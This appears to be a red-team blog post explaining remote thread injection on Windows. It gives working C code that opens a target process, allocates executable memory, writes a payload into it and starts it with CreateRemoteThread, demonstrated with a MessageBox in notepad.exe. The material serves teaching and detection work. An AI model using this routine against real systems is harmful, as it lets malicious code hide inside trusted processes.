I am continuing the last post regarding the process enumeration that we can use to find the target process that become the host of our payload
After we get the specific process PID then we can try to open the target process using the code below. The PID is the process ID that we got from the enumeration
hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
FALSE, (DWORD)pid);
When the above execution is successful then go further to inject the payload by creating the threat in the target process
Below is the very basic remote thread injection code. I believe this code will trigger so much alert so becreafull on using it
int Inject(HANDLE hProc, unsigned char* payload, unsigned int payload_len) {
LPVOID pRemoteCode = NULL;
HANDLE hThread = NULL;
pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL);
hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
if (hThread != NULL) {
WaitForSingleObject(hThread, 500);
CloseHandle(hThread);
return 0;
}
return -1;
}
The above code will create new memory space VirtualAllocEx in the target process with execute capability (PAGE_EXECUTE_READ). When the memory space has been created then the payload is ready to be copied to the new space using WriteProcessMemory. if the memory copy process work smoothly then a thread in the process need to be activated using CreateRemoteThread.
We can see notepad.exe thread with the process hacker before payload is injectedas below
We can compare the threads after we execute the injection
The payload is successfully executed in the newly created thread within notepad.exe process. The payload that we inject is to execute MessageBox like below. We can see the detail in thread 7728 the messagebox API were called
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 